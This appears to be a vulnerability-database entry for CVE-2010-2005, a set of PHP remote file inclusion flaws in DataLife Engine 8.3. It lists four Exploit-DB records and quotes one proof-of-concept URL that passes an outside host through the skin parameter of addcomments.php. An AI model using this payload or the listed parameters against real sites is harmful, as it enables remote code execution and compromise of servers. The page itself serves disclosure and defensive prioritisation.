CVE-2010-2005

high
Published 2010-05-20 · Modified 2026-04-29
CVSS v3
—
CVSS v4 NEW
—
not yet in upstream
VIR risk
8.5

Description

Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, and (4) the _REQUEST[skin] parameter to engine/ajax/addcomments.php.

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-33544 webapps php verified text · 1 KB
indoushka · 2010-01-19

DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion

text exploit Source: Exploit-DB
source: https://www.securityfocus.com/bid/37851/info
   
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
   
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
   
Datalife Engine 8.3 is vulnerable; other versions may also be affected. 

http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com 

EDB-33543 webapps php verified
indoushka · 2010-01-19

DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion

EDB-33542 webapps php verified
indoushka · 2010-01-19

DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion

EDB-33541 webapps php verified
indoushka · 2010-01-19

DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion


Application impact

Vendor | Product | Versions | Fixed
datalifecms | datalife_engine | 8.3 |

References

CWEs

CWE-94
